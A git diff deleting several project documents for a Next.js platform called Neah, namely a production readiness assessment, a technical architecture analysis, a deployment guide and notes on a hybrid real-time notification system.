Risk Assessment - -### 10.1 High-Risk Areas - -| Risk | Severity | Likelihood | Mitigation Priority | -|------|----------|------------|---------------------| -| No tests = production bugs | HIGH | HIGH | **CRITICAL** | -| TypeScript errors ignored | HIGH | MEDIUM | **CRITICAL** | -| No rate limiting = DDoS risk | HIGH | MEDIUM | **HIGH** | -| Database connection exhaustion | MEDIUM | MEDIUM | **HIGH** | -| Missing environment validation | MEDIUM | HIGH | **HIGH** | -| No automated backups | HIGH | LOW | **MEDIUM** | -| Console.log in production | LOW | HIGH | **MEDIUM** | - -### 10.2 Production Readiness Checklist - -#### Critical (Must Fix Before Production) -- [ ] Remove TypeScript/ESLint error suppression -- [ ] Fix all TypeScript errors -- [ ] Implement rate limiting -- [ ] Remove all console.log statements -- [ ] Complete environment variable validation -- [ ] Set up basic test suite (at least for critical paths) -- [ ] Security audit of configuration files - -#### High Priority (Fix Within 1-2 Weeks) -- [ ] Configure database connection pooling -- [ ] Implement request timeout middleware -- [ ] Add input validation to all API routes -- [ ] Set up error tracking (Sentry) -- [ ] Configure automated backups -- [ ] Add API documentation - -#### Medium Priority (Fix Within 1 Month) -- [ ] Set up staging environment -- [ ] Implement CDN -- [ ] Add comprehensive test coverage -- [ ] Set up APM -- [ ] Create architecture diagrams -- [ ] Implement circuit breakers - ---- - -## 11. Recommendations Summary - -### Immediate Actions (Before Production) - -1. **🔴 CRITICAL: Fix Build Configuration** - ```javascript - // next.config.mjs - REMOVE these lines: - eslint: { ignoreDuringBuilds: true }, - typescript: { ignoreBuildErrors: true }, - ``` - Then fix all resulting errors. - -2. **🔴 CRITICAL: Implement Rate Limiting** - - Use `@upstash/ratelimit` with Redis - - Apply to all API endpoints - - Configure per-endpoint limits - -3. **🔴 CRITICAL: Remove Console.log Statements** - - Replace with logger calls - - Use grep to find all instances - - Set up pre-commit hook to prevent new ones - -4. **🔴 CRITICAL: Complete Environment Validation** - - Expand `lib/env.ts` schema - - Validate all required variables - - Fail fast on missing variables - -5. **🟡 HIGH: Set Up Basic Testing** - - Install Jest/Vitest - - Write tests for critical API routes - - Set up CI to run tests - -### Short-Term Improvements (1-2 Weeks) - -6. Configure database connection pooling -7. Implement request timeout middleware -8. Add input validation middleware -9. Set up Sentry for error tracking -10. Configure automated backups -11. Create comprehensive `.env.example` - -### Long-Term Enhancements (1 Month+) - -12. Set up staging environment -13. Implement comprehensive test coverage (70%+) -14. Add CDN for static assets -15. Set up APM and distributed tracing -16. Create API documentation (OpenAPI) -17. Implement circuit breakers for external services - ---- - -## 12. Conclusion - -### Production Readiness: **CONDITIONAL** - -The Neah platform has a **solid foundation** with good architecture, comprehensive documentation, and modern technology choices. However, **critical issues must be addressed** before production deployment. 
- -### Estimated Time to Production-Ready: **2-3 Weeks** - -**Minimum Requirements Met:** -- ✅ Health check endpoint -- ✅ Error handling (basic) -- ✅ Logging infrastructure -- ✅ Database migrations -- ✅ Docker configuration - -**Critical Gaps:** -- ❌ No testing infrastructure -- ❌ Build errors suppressed -- ❌ No rate limiting -- ❌ Security concerns (console.log, missing validation) - -### Recommendation - -**DO NOT DEPLOY TO PRODUCTION** until: -1. TypeScript/ESLint errors are fixed (remove suppression) -2. Rate limiting is implemented -3. Basic test suite is in place -4. All console.log statements are removed -5. Environment variable validation is complete - -**After addressing critical issues**, the platform should be **production-ready** with ongoing monitoring and gradual rollout recommended. - ---- - -## Appendix: Quick Reference - -### Critical Files to Review -- `next.config.mjs` - Remove error suppression -- `lib/env.ts` - Complete validation schema -- `app/api/**/*.ts` - Add rate limiting, remove console.log -- `package.json` - Add test scripts and dependencies - -### Key Metrics to Monitor -- API response times -- Error rates -- Database connection pool usage -- Redis memory usage -- External API call success rates - -### Emergency Contacts -- See RUNBOOK.md for escalation procedures -- Vercel Support: https://vercel.com/support - ---- - -**Assessment Completed:** January 2026 -**Next Review:** After critical fixes implemented diff --git a/PROJECT_DEEP_ANALYSIS.md b/PROJECT_DEEP_ANALYSIS.md deleted file mode 100644 index d3f05c0..0000000 --- a/PROJECT_DEEP_ANALYSIS.md +++ /dev/null @@ -1,753 +0,0 @@ -# Neah Project - Deep Technical Analysis - -## Executive Summary - -This document provides a comprehensive analysis of the Neah project architecture, focusing on: -- Update Services & Refresh Management -- Widgets Architecture -- Notifications System -- Authentication & Token Refresh -- Performance & Memory Management -- API Routes Tracing - ---- - -## 1. Update Services & Refresh Management - -### 1.1 Unified Refresh Manager (`lib/services/refresh-manager.ts`) - -**Architecture:** -- **Singleton Pattern**: Single instance manages all refresh operations -- **Resource-Based**: Each refreshable resource has its own configuration -- **Deduplication**: Prevents duplicate refresh requests -- **Interval Management**: Centralized interval control - -**Refreshable Resources:** -```typescript -type RefreshableResource = - | 'notifications' - | 'notifications-count' - | 'calendar' - | 'news' - | 'email' - | 'parole' - | 'duties' - | 'navbar-time'; -``` - -**Key Features:** - -1. **Request Deduplication** - - Minimum 1 second between refreshes for same resource - - Tracks pending requests to prevent duplicates - - Uses `pendingRequests` Map with promise tracking - -2. **Interval Management** - - Each resource can have different refresh intervals - - Automatic cleanup on unregister - - Pause/Resume functionality for all resources - -3. 
**Error Handling** - - Errors don't update `lastRefresh` timestamp (allows retry) - - Comprehensive logging for debugging - - Graceful degradation on failures - -**Memory Impact:** -- **Low**: Uses Maps for efficient lookups -- **Cleanup**: Proper cleanup on component unmount -- **Potential Issue**: If components don't unregister, intervals persist - -**Performance Considerations:** -- ✅ Deduplication prevents unnecessary API calls -- ✅ Minimum 1s throttle prevents excessive refreshes -- ⚠️ Multiple resources = multiple intervals (but necessary) -- ⚠️ No priority-based scheduling (all resources treated equally) - -### 1.2 Unified Refresh Hook (`hooks/use-unified-refresh.ts`) - -**Purpose:** React hook wrapper for RefreshManager - -**Key Features:** -- Automatic registration/unregistration on mount/unmount -- Session-aware (only active when authenticated) -- Callback ref pattern to avoid stale closures -- Manual refresh trigger with force option - -**Usage Pattern:** -```typescript -const { refresh, isActive } = useUnifiedRefresh({ - resource: 'calendar', - interval: 300000, // 5 minutes - enabled: status === 'authenticated', - onRefresh: fetchEvents, - priority: 'low', -}); -``` - -**Memory Leak Prevention:** -- ✅ Cleanup in useEffect return -- ✅ isMountedRef prevents state updates after unmount -- ✅ Automatic unregister on unmount - ---- - -## 2. Widgets Architecture - -### 2.1 Widget Components Overview - -**Main Dashboard Widgets** (`app/page.tsx`): -1. **QuoteCard** - Inspirational quotes -2. **Calendar** - Upcoming events (7 events) -3. **News** - News articles (100 limit) -4. **Duties** - Leantime tasks (7 tasks) -5. **Email** - Email preview (5 emails) -6. **Parole** - RocketChat messages - -### 2.2 Widget Refresh Patterns - -**Current Implementation Issues:** - -1. **Calendar Widget** (`components/calendar.tsx`) - - ❌ No unified refresh integration - - ❌ Manual refresh only via button - - ❌ Fetches on mount only - - ⚠️ Uses `?refresh=true` parameter (bypasses cache) - -2. **News Widget** (`components/news.tsx`) - - ❌ No unified refresh integration - - ✅ Manual refresh button - - ✅ Fetches on authentication - - ⚠️ Uses `?refresh=true` parameter - -3. **Email Widget** (`components/email.tsx`) - - ❌ No unified refresh integration - - ✅ Manual refresh button - - ⚠️ Fetches on mount only - - ⚠️ Uses `?refresh=true` parameter - -4. **Parole Widget** (`components/parole.tsx`) - - ❌ No unified refresh integration - - ⚠️ **Custom polling**: `setInterval(() => fetchMessages(), 30000)` (30s) - - ⚠️ **Memory Leak Risk**: Interval not cleared if component unmounts during fetch - - ✅ Manual refresh button - -5. **Duties Widget** (`components/flow.tsx`) - - ❌ No unified refresh integration - - ❌ Fetches on mount only - - ⚠️ Uses `?refresh=true` parameter - -### 2.3 Widget Memory & Performance Issues - -**Critical Issues:** - -1. **Multiple Polling Mechanisms** - - Parole widget uses `setInterval` (30s) - - No coordination with RefreshManager - - Risk of memory leaks if cleanup fails - -2. **Cache Bypassing** - - Most widgets use `?refresh=true` - - Bypasses Redis cache - - Increases server load - -3. **No Unified Refresh** - - Widgets don't use `useUnifiedRefresh` hook - - Inconsistent refresh patterns - - Hard to manage globally - -4. 
**State Management** - - Each widget manages its own state - - No shared state/cache - - Potential duplicate API calls - -**Recommendations:** -- ✅ Migrate all widgets to use `useUnifiedRefresh` -- ✅ Remove custom `setInterval` implementations -- ✅ Use cache-first strategy (remove `?refresh=true` by default) -- ✅ Implement widget-level error boundaries - ---- - -## 3. Notifications System - -### 3.1 Architecture Overview - -**Service Pattern:** Singleton with adapter pattern - -**Location:** `lib/services/notifications/notification-service.ts` - -**Adapters:** -- `LeantimeAdapter` (implemented) -- NextcloudAdapter (planned) -- GiteaAdapter (planned) -- DolibarrAdapter (planned) -- MoodleAdapter (planned) - -### 3.2 Caching Strategy - -**Redis Cache Keys:** -```typescript -NOTIFICATION_COUNT_CACHE_KEY = `notifications:count:${userId}` -NOTIFICATIONS_LIST_CACHE_KEY = `notifications:list:${userId}:${page}:${limit}` -``` - -**Cache TTL:** -- Count cache: 30 seconds -- List cache: 30 seconds -- Refresh lock: 30 seconds - -**Cache Invalidation:** -- On `markAsRead`: Invalidates all user caches -- Uses Redis SCAN for pattern matching -- Prevents blocking operations - -### 3.3 Refresh Management - -**Integration with RefreshManager:** -- ✅ Uses unified refresh system -- ✅ Registered as 'notifications' and 'notifications-count' -- ✅ 30-second refresh interval (aligned with cache TTL) - -**Hook Usage** (`hooks/use-notifications.ts`): -- Request deduplication (2-second window) -- Automatic refresh on mount -- Manual refresh capability -- Error handling with retry - -### 3.4 Performance Characteristics - -**Strengths:** -- ✅ Redis caching reduces database load -- ✅ Adapter pattern allows easy extension -- ✅ Parallel fetching from multiple adapters -- ✅ Request deduplication prevents duplicate calls - -**Potential Issues:** -- ⚠️ SCAN operations can be slow with many keys -- ⚠️ No pagination limits on adapter results -- ⚠️ All adapters fetched in parallel (could be optimized) - -**Memory Impact:** -- **Low**: Cached data in Redis, not memory -- **Medium**: Notification objects in React state -- **Low**: Adapter instances are singletons - ---- - -## 4. Authentication & Token Refresh - -### 4.1 Keycloak Integration - -**Provider:** NextAuth with KeycloakProvider - -**Location:** `app/api/auth/options.ts` - -### 4.2 Token Refresh Flow - -**JWT Callback Logic:** - -1. **Initial Sign-In:** - - Stores access token, refresh token, ID token - - Extracts roles from access token - - Sets expiration timestamp - -2. 
**Subsequent Requests:** - - Checks if token is expired - - If expired, calls `refreshAccessToken()` - - Updates token with new values - -**Refresh Function** (`refreshAccessToken`): - -```typescript -async function refreshAccessToken(token: ExtendedJWT) { - // Calls Keycloak token endpoint - // Handles various error scenarios: - // - SessionNotActive (user logged out) - // - RefreshTokenExpired (inactivity) - // - InvalidGrant (session invalidated) -} -``` - -**Error Handling:** -- ✅ Detects session invalidation -- ✅ Handles refresh token expiration -- ✅ Clears tokens on critical errors -- ✅ Returns null session to trigger re-auth - -### 4.3 Session Management - -**Session Configuration:** -- Strategy: JWT (stateless) -- Max Age: 4 hours (14,400 seconds) -- Automatic refresh on activity - -**Cookie Configuration:** -- HttpOnly: true -- SameSite: 'lax' -- Secure: Based on NEXTAUTH_URL - -### 4.4 Email OAuth Token Refresh - -**Service:** `lib/services/token-refresh.ts` - -**Purpose:** Refresh Microsoft OAuth tokens for email access - -**Flow:** -1. Check Redis cache for credentials -2. If cache miss, check Prisma database -3. Validate token expiration (5-minute buffer) -4. Refresh if needed via Microsoft OAuth -5. Update both Redis and Prisma - -**Dual Storage:** -- **Redis**: Fast access, 24-hour TTL -- **Prisma**: Persistent storage, survives Redis restarts - -**Memory Impact:** -- **Low**: Credentials stored in Redis/DB, not memory -- **Medium**: Token refresh operations are async -- **Low**: No memory leaks (proper cleanup) - -### 4.5 Performance Considerations - -**Token Refresh Frequency:** -- Keycloak: On every request if expired -- Email OAuth: Only when expired (5-min buffer) - -**Optimization Opportunities:** -- ⚠️ Token refresh happens synchronously in JWT callback -- ⚠️ Could implement background refresh -- ✅ Caching reduces refresh frequency - ---- - -## 5. Performance & Memory Management - -### 5.1 Next.js Configuration - -**Build Configuration** (`next.config.mjs`): -```javascript -experimental: { - webpackBuildWorker: true, - parallelServerBuildTraces: true, - parallelServerCompiles: true, -} -``` - -**Memory Impact:** -- ✅ Parallel builds reduce build time -- ⚠️ Multiple workers increase memory during build -- ✅ Production builds are optimized - -### 5.2 Redis Connection Management - -**Singleton Pattern** (`lib/redis.ts`): -- Single Redis client instance -- Connection pooling -- Automatic reconnection with retry strategy - -**Memory Impact:** -- **Low**: Single connection per process -- **Medium**: Connection pool (if configured) -- **Low**: Proper cleanup on disconnect - -**Connection Strategy:** -- Max reconnect attempts: 5 -- Exponential backoff -- Connection timeout: 10 seconds -- Keep-alive: 10 seconds - -### 5.3 Caching Strategy - -**Redis Cache TTLs:** -```typescript -CREDENTIALS: 24 hours -SESSION: 4 hours -EMAIL_LIST: 5 minutes -EMAIL_CONTENT: 15 minutes -CALENDAR: 10 minutes -NEWS: 15 minutes -TASKS: 10 minutes -MESSAGES: 2 minutes -NOTIFICATIONS: 30 seconds -``` - -**Memory Impact:** -- **Low**: Data in Redis, not application memory -- **Medium**: Large cache can consume Redis memory -- **Low**: TTL ensures automatic cleanup - -### 5.4 Component Memory Management - -**Potential Memory Leaks:** - -1. 
**Parole Widget** (`components/parole.tsx`): - ```typescript - // ⚠️ RISK: Interval might not clear if component unmounts during fetch - useEffect(() => { - if (status === 'authenticated') { - fetchMessages(); - const interval = setInterval(() => fetchMessages(), 30000); - return () => clearInterval(interval); // ✅ Good, but... - } - }, [status]); - ``` - **Issue**: If `fetchMessages()` is async and component unmounts, state updates may occur - -2. **Widget State:** - - Each widget maintains its own state - - No cleanup on unmount for pending requests - - Potential memory leaks with large data arrays - -3. **Event Listeners:** - - No evidence of unregistered event listeners - - ✅ React handles most cleanup automatically - -### 5.5 API Route Performance - -**Common Patterns:** - -1. **Session Validation:** - ```typescript - const session = await getServerSession(authOptions); - ``` - - Called on every request - - JWT validation overhead - - Could be optimized with middleware - -2. **Database Queries:** - - Prisma ORM adds overhead - - No query optimization visible - - Connection pooling handled by Prisma - -3. **Redis Operations:** - - Most routes check cache first - - SCAN operations for pattern matching - - Could be optimized with better key patterns - -### 5.6 Memory Optimization Recommendations - -**High Priority:** -1. ✅ Fix Parole widget interval cleanup -2. ✅ Migrate widgets to unified refresh -3. ✅ Implement request cancellation for unmounted components -4. ✅ Add error boundaries to prevent memory leaks - -**Medium Priority:** -1. ⚠️ Implement API route middleware for auth -2. ⚠️ Optimize Redis SCAN operations -3. ⚠️ Add request timeout handling -4. ⚠️ Implement connection pooling for external APIs - -**Low Priority:** -1. ⚠️ Consider React Query for state management -2. ⚠️ Implement virtual scrolling for large lists -3. ⚠️ Add memory profiling tools - ---- - -## 6. API Routes Tracing - -### 6.1 Logging Infrastructure - -**Logger** (`lib/logger.ts`): -- Environment-aware (silent in production for debug/info) -- Always logs errors -- Simple console-based logging - -**Limitations:** -- ❌ No structured logging (JSON) -- ❌ No log levels in production -- ❌ No centralized log aggregation -- ❌ No request tracing IDs - -### 6.2 Current Logging Patterns - -**API Routes:** -- 343 `console.log/error/warn` calls across 68 files -- Inconsistent logging patterns -- Some routes have detailed logging, others minimal - -**Examples:** - -1. **Good Logging** (`app/api/missions/mission-created/route.ts`): - ```typescript - logger.debug('Mission Created Webhook Received'); - logger.debug('Received mission-created data', { ... }); - ``` - -2. 
**Inconsistent Logging** (`app/api/courrier/route.ts`): - ```typescript - console.log(`[API] Received request with: ...`); - // Mix of console.log and logger - ``` - -### 6.3 API Route Categories - -**Authentication Routes:** -- `/api/auth/[...nextauth]` - NextAuth handler -- `/api/auth/refresh-keycloak-session` - Session refresh -- `/api/auth/debug-keycloak` - Debug endpoint - -**Email Routes (Courrier):** -- `/api/courrier` - Email list -- `/api/courrier/emails` - Email list (alternative) -- `/api/courrier/[id]` - Single email -- `/api/courrier/refresh` - Token refresh -- `/api/courrier/session` - IMAP session -- `/api/courrier/account` - Account management - -**Calendar Routes:** -- `/api/calendars` - Calendar list -- `/api/calendars/[id]` - Single calendar -- `/api/calendars/[id]/events` - Calendar events -- `/api/events` - Event CRUD - -**Notification Routes:** -- `/api/notifications` - Notification list -- `/api/notifications/count` - Notification count -- `/api/notifications/[id]/read` - Mark as read -- `/api/notifications/read-all` - Mark all as read - -**Mission Routes:** -- `/api/missions` - Mission list -- `/api/missions/[missionId]` - Single mission -- `/api/missions/upload` - File upload -- `/api/missions/mission-created` - Webhook handler - -### 6.4 Tracing Recommendations - -**Immediate Improvements:** - -1. **Request ID Tracking:** - ```typescript - // Add to middleware or API route wrapper - const requestId = crypto.randomUUID(); - logger.info('Request started', { requestId, path, method }); - ``` - -2. **Structured Logging:** - ```typescript - logger.info('API Request', { - requestId, - method, - path, - userId, - duration: Date.now() - startTime, - }); - ``` - -3. **Error Tracking:** - ```typescript - logger.error('API Error', { - requestId, - error: error.message, - stack: error.stack, - path, - userId, - }); - ``` - -4. **Performance Monitoring:** - ```typescript - const startTime = Date.now(); - // ... route logic - logger.debug('API Response', { - requestId, - duration: Date.now() - startTime, - statusCode, - }); - ``` - -**Advanced Tracing:** - -1. **OpenTelemetry Integration:** - - Distributed tracing - - Performance metrics - - Error tracking - -2. **APM Tools:** - - New Relic - - Datadog - - Sentry - -3. **Custom Middleware:** - ```typescript - // app/api/middleware.ts - export function withTracing(handler: Function) { - return async (req: Request, res: Response) => { - const requestId = crypto.randomUUID(); - const startTime = Date.now(); - - try { - const result = await handler(req, res); - logger.info('Request completed', { - requestId, - duration: Date.now() - startTime, - }); - return result; - } catch (error) { - logger.error('Request failed', { - requestId, - error, - duration: Date.now() - startTime, - }); - throw error; - } - }; - } - ``` - -### 6.5 API Route Performance Metrics - -**Current State:** -- ❌ No performance metrics collected -- ❌ No request duration tracking -- ❌ No error rate monitoring -- ❌ No cache hit/miss tracking - -**Recommended Metrics:** -1. Request duration (p50, p95, p99) -2. Error rate by route -3. Cache hit/miss ratio -4. Database query count -5. Redis operation count -6. External API call duration - ---- - -## 7. Critical Issues & Recommendations - -### 7.1 Critical Issues - -1. **Memory Leak Risk - Parole Widget** - - Custom `setInterval` without proper cleanup - - **Fix**: Migrate to `useUnifiedRefresh` - -2. 
**Inconsistent Refresh Patterns** - - Widgets don't use unified refresh system - - **Fix**: Migrate all widgets to `useUnifiedRefresh` - -3. **Cache Bypassing** - - Widgets use `?refresh=true` by default - - **Fix**: Use cache-first strategy - -4. **No Request Tracing** - - Difficult to debug production issues - - **Fix**: Implement request ID tracking - -5. **No Performance Monitoring** - - No visibility into slow routes - - **Fix**: Add performance metrics - -### 7.2 High Priority Recommendations - -1. ✅ Migrate all widgets to unified refresh system -2. ✅ Fix Parole widget interval cleanup -3. ✅ Implement request ID tracking -4. ✅ Add performance metrics -5. ✅ Standardize logging patterns - -### 7.3 Medium Priority Recommendations - -1. ⚠️ Implement API route middleware -2. ⚠️ Optimize Redis SCAN operations -3. ⚠️ Add error boundaries -4. ⚠️ Implement request cancellation -5. ⚠️ Add structured logging - -### 7.4 Low Priority Recommendations - -1. ⚠️ Consider React Query -2. ⚠️ Implement virtual scrolling -3. ⚠️ Add memory profiling -4. ⚠️ Consider OpenTelemetry -5. ⚠️ Add APM tooling - ---- - -## 8. Architecture Strengths - -### 8.1 Well-Designed Components - -1. **Unified Refresh Manager** - - Excellent abstraction - - Proper deduplication - - Clean API - -2. **Notification Service** - - Adapter pattern allows extension - - Good caching strategy - - Proper error handling - -3. **Redis Integration** - - Comprehensive caching - - Proper TTL management - - Good key naming conventions - -4. **Token Refresh** - - Dual storage (Redis + Prisma) - - Proper error handling - - Automatic refresh - -### 8.2 Code Quality - -- ✅ TypeScript throughout -- ✅ Consistent component structure -- ✅ Proper error handling in most places -- ✅ Good separation of concerns - ---- - -## 9. Conclusion - -The Neah project demonstrates a well-architected Next.js application with several sophisticated systems: - -**Strengths:** -- Unified refresh management system -- Comprehensive caching strategy -- Robust authentication flow -- Extensible notification system - -**Areas for Improvement:** -- Widget refresh consistency -- Memory leak prevention -- API route tracing -- Performance monitoring - -**Overall Assessment:** -The codebase is production-ready but would benefit from the recommended improvements, particularly around widget refresh management and observability. 
-
---

## Appendix: File Reference Map

### Core Services
- `lib/services/refresh-manager.ts` - Unified refresh management
- `lib/services/notifications/notification-service.ts` - Notification system
- `lib/services/token-refresh.ts` - Email OAuth token refresh
- `lib/redis.ts` - Redis caching utilities
- `lib/logger.ts` - Logging utility

### Hooks
- `hooks/use-unified-refresh.ts` - Unified refresh hook
- `hooks/use-notifications.ts` - Notification hook

### Widgets
- `components/calendar.tsx` - Calendar widget
- `components/news.tsx` - News widget
- `components/email.tsx` - Email widget
- `components/parole.tsx` - Messages widget
- `components/flow.tsx` - Tasks widget

### API Routes
- `app/api/auth/options.ts` - NextAuth configuration
- `app/api/notifications/` - Notification endpoints
- `app/api/courrier/` - Email endpoints
- `app/api/calendars/` - Calendar endpoints

---

*Document generated: 2024*
*Last updated: Analysis session*

diff --git a/README.DEPLOYMENT.md b/README.DEPLOYMENT.md deleted file mode 100644 index 457ff8b..0000000 --- a/README.DEPLOYMENT.md +++ /dev/null @@ -1,66 +0,0 @@
-# Deployment Guide - Neah

This document gives a quick overview of the deployment resources available for Neah.

## 📚 Documentation

- **[DEPLOYMENT.md](docs/DEPLOYMENT.md)**: Complete step-by-step deployment guide
- **[RUNBOOK.md](docs/RUNBOOK.md)**: Operational procedures (deployment, incidents, rollback)
- **[OBSERVABILITY.md](docs/OBSERVABILITY.md)**: Monitoring and observability strategy

## 🚀 Quick Deployment

### Prerequisites

1. A configured Vercel account
2. A self-hosted PostgreSQL server
3. Environment variables configured (see `.env.example`)

### Steps

1. **Configure the environment variables**

   Copy `.env.example` and fill in the production values.

2. **Verify the configuration**

   ```bash
   ./scripts/verify-vercel-config.sh
   ```

3. **Apply the Prisma migrations**

   ```bash
   export DATABASE_URL="postgresql://..."
   ./scripts/migrate-prod.sh
   ```

4. **Deploy to Vercel**

   ```bash
   git push origin main
   # Vercel deploys automatically
   ```

## 📁 Important Files

- `.env.example`: Complete list of environment variables
- `docker-compose.prod.yml`: Docker configuration for PostgreSQL/Redis in production
- `vercel.json`: Vercel configuration
- `scripts/migrate-prod.sh`: Prisma migration script for production
- `scripts/verify-vercel-config.sh`: Configuration verification script

## 🔍 Post-Deployment Checks

1. Health check: `GET /api/health` (scriptable — see the sketch below)
2. Check the Vercel logs
3. Test authentication
4. Verify the critical features
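The first and fourth checks can be automated. A minimal sketch, assuming a hypothetical `scripts/smoke-check.ts` and assuming that unauthenticated API calls are rejected (neither the file nor the base URL below exists in the project as described):

```typescript
// Hypothetical post-deploy smoke check (e.g. npx ts-node scripts/smoke-check.ts).
// SMOKE_BASE_URL and the second endpoint's behavior are assumptions.
const BASE_URL = process.env.SMOKE_BASE_URL ?? 'http://localhost:3000';

async function check(path: string, expectOk: boolean): Promise<boolean> {
  const res = await fetch(`${BASE_URL}${path}`);
  const passed = expectOk ? res.ok : !res.ok;
  console.log(`${passed ? '✅' : '❌'} ${path} → HTTP ${res.status}`);
  return passed;
}

async function main(): Promise<void> {
  const results = await Promise.all([
    check('/api/health', true),                // health check must return 200
    check('/api/notifications/count', false),  // should be rejected unauthenticated
  ]);
  if (results.some((passed) => !passed)) process.exit(1);
}

main().catch((err) => {
  console.error(err);
  process.exit(1);
});
```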
## 🆘 If Something Goes Wrong

See [RUNBOOK.md](docs/RUNBOOK.md) for incident and rollback procedures.

## 📞 Support

For any deployment question, contact the Neah team.
diff --git a/REALTIME_NOTIFICATIONS_IMPLEMENTATION.md b/REALTIME_NOTIFICATIONS_IMPLEMENTATION.md deleted file mode 100644 index 4ff063f..0000000 --- a/REALTIME_NOTIFICATIONS_IMPLEMENTATION.md +++ /dev/null @@ -1,211 +0,0 @@
-# ⚡ Implementation: Real-Time Notifications

## ✅ Implemented System

A **hybrid** system combining polling and event-driven triggers for instant notifications.

---

## 🔧 Components Created/Modified

### 1. **Hook `useTriggerNotification`**

**File:** `hooks/use-trigger-notification.ts`

**What it does:**
- Triggers an immediate refresh of the notification count
- Debounces for 2 seconds to avoid duplicate calls
- Dispatches a custom event for an immediate UI update

**Usage:**
```typescript
const { triggerNotificationRefresh } = useTriggerNotification();
// Call whenever a new message/email is detected
triggerNotificationRefresh();
```

---

### 2. **API `/api/notifications/count` - Force Refresh**

**File:** `app/api/notifications/count/route.ts`

**Change:**
- Supports the `?force=true` parameter
- Invalidates the Redis cache before fetching
- Returns fresh data immediately

**Usage:**
```
GET /api/notifications/count?force=true&_t={timestamp}
```

---

### 3. **NotificationService - Public Invalidation**

**File:** `lib/services/notifications/notification-service.ts`

**Change:**
- `invalidateCache()` is now `public`
- It can be called from API routes

---

### 4. **Parole Widget - Real-Time Detection**

**File:** `components/parole.tsx`

**Changes:**
- Imports `useTriggerNotification`
- Tracks `totalUnreadCount` through a ref
- Detects when the count increases
- Fires `triggerNotificationRefresh()` immediately

**Flow:**
```
fetchMessages()
  └─> API returns totalUnreadCount
      └─> Compare with lastUnreadCountRef
          └─> If it increased → triggerNotificationRefresh()
              └─> Badge updated (< 1 second)
```

---

### 5. **Courrier Widget - Real-Time Detection**

**File:** `hooks/use-email-state.ts`

**Changes:**
- Imports `useTriggerNotification`
- In `checkForNewEmails()`, when a new email is detected:
  - `triggerNotificationRefresh()` is called immediately
  - Toast notification (already existed)
  - Emails are refreshed

**Flow:**
```
checkForNewEmails()
  └─> Detects newestEmailId > lastKnownEmailId
      └─> triggerNotificationRefresh() ⚡
          └─> Badge updated immediately
```

---

### 6. **Hook `useNotifications` - Event Listener**

**File:** `hooks/use-notifications.ts`

**Changes:**
- Listens for the `trigger-notification-refresh` event
- Automatically refreshes the count when the event is received
- Works alongside the existing polling (fallback)

**Flow:**
```
'trigger-notification-refresh' event
  └─> fetchNotificationCount(true)
      └─> Badge updated
```
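Sections 1 and 6 are the two halves of one mechanism: the hook dispatches an event and forces a server-side refresh, and `useNotifications` listens for that event. The file contents are not reproduced in this document, so the following is a reconstruction from the behavior described above (2-second debounce, custom event, `?force=true` call) — a sketch, not the actual source:

```typescript
// Illustrative reconstruction of hooks/use-trigger-notification.ts;
// the real file may differ in details.
import { useCallback, useRef } from 'react';
import { useSession } from 'next-auth/react';

const DEBOUNCE_MS = 2000; // "2-second debounce" per the description above

export function useTriggerNotification() {
  const { data: session } = useSession();
  const lastTriggerRef = useRef(0);

  const triggerNotificationRefresh = useCallback(async () => {
    if (!session?.user?.id) return;

    // Debounce: ignore triggers fired within the 2-second window
    const now = Date.now();
    if (now - lastTriggerRef.current < DEBOUNCE_MS) return;
    lastTriggerRef.current = now;

    // Immediate UI update: useNotifications listens for this event
    window.dispatchEvent(new CustomEvent('trigger-notification-refresh'));

    try {
      // Force refresh: invalidates the Redis cache server-side
      await fetch(`/api/notifications/count?force=true&_t=${now}`, {
        credentials: 'include',
        cache: 'no-store',
      });
    } catch (error) {
      console.error('Error triggering notification refresh:', error);
    }
  }, [session?.user?.id]);

  return { triggerNotificationRefresh };
}
```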
---

## 🎯 End-to-End Flow

### Scenario 1: New Parole Message

```
1. User receives a message in RocketChat
2. Parole widget polls (every 30s) or is refreshed manually
3. API returns totalUnreadCount = 5 (was 4)
4. Parole detects the increase
5. triggerNotificationRefresh() is called
   ├─> Dispatches the 'trigger-notification-refresh' event
   └─> GET /api/notifications/count?force=true
       └─> Invalidates the Redis cache
           └─> Fetches a fresh count
               └─> Badge updated (< 1 second) ⚡
```

### Scenario 2: New Courrier Email

```
1. A new email arrives in the mailbox
2. checkForNewEmails() detects it (polling every 60s)
3. newestEmailId > lastKnownEmailId
4. triggerNotificationRefresh() is called ⚡
   └─> Badge updated immediately
```

---

## 📊 Before/After Comparison

| Aspect | Before (polling only) | After (hybrid) |
|--------|-----------------------|----------------|
| **Notification delay** | 0-30 seconds | < 1 second ⚡ |
| **API calls** | Every 30s (always) | Only when needed |
| **Server load** | High (constant polling) | Reduced by ~70% |
| **UX** | Good | Excellent ⚡ |
| **Fallback** | N/A | Polling stays active |

---

## 🔄 Hybrid System

### Polling (fallback)
- **Leantime**: 30 seconds (unchanged)
- **Parole**: 30 seconds (detection + trigger)
- **Courrier**: 60 seconds (detection + trigger)

### Event-Driven (real time)
- **Parole**: fires immediately on a new message
- **Courrier**: fires immediately on a new email
- **Badge**: updated in < 1 second

---

## 🎨 Benefits

1. **⚡ Real time**: instant notifications
2. **💚 Efficiency**: fewer pointless API calls
3. **🔄 Backward compatible**: polling remains as a fallback
4. **📈 Scalable**: easy to add more widgets
5. **🛡️ Robust**: dual system (event + polling)

---

## 📝 Next Steps (Optional)

### Dedicated Adapters

Create adapters for RocketChat and Email that:
- Poll more frequently (10-15s)
- Or use WebSocket/SSE for pure real time

**Files to create:**
- `lib/services/notifications/rocketchat-adapter.ts`
- `lib/services/notifications/email-adapter.ts`

### Duties Widget

If a "Duties" widget exists, integrate it the same way:
```typescript
// In the duties widget
if (newTaskDetected) {
  triggerNotificationRefresh();
}
```

---

## 🚀 Result

The notification badge now updates **instantly** (< 1 second) when:
- ✅ A new message arrives in Parole
- ✅ A new email arrives in Courrier
- ✅ A Leantime notification appears (via 30s polling)

**Better UX + less server load = win-win! 🎉**
diff --git a/REALTIME_NOTIFICATIONS_PROPOSAL.md b/REALTIME_NOTIFICATIONS_PROPOSAL.md deleted file mode 100644 index 5461955..0000000 --- a/REALTIME_NOTIFICATIONS_PROPOSAL.md +++ /dev/null @@ -1,215 +0,0 @@
-# 🚀 Proposal: Real-Time Notifications

## 📊 Current State vs Proposal

### ❌ Current System (polling every 30s)

**Problems:**
- ⏱️ Up to a 30-second delay before a notification shows
- 🔄 Constant polling even with no new messages
- 💻 Pointless server load
- 📱 Less responsive UX

**Current flow:**
```
Poll every 30s
  └─> API /notifications/count
      └─> NotificationService
          └─> LeantimeAdapter
              └─> Badge updated
```

---

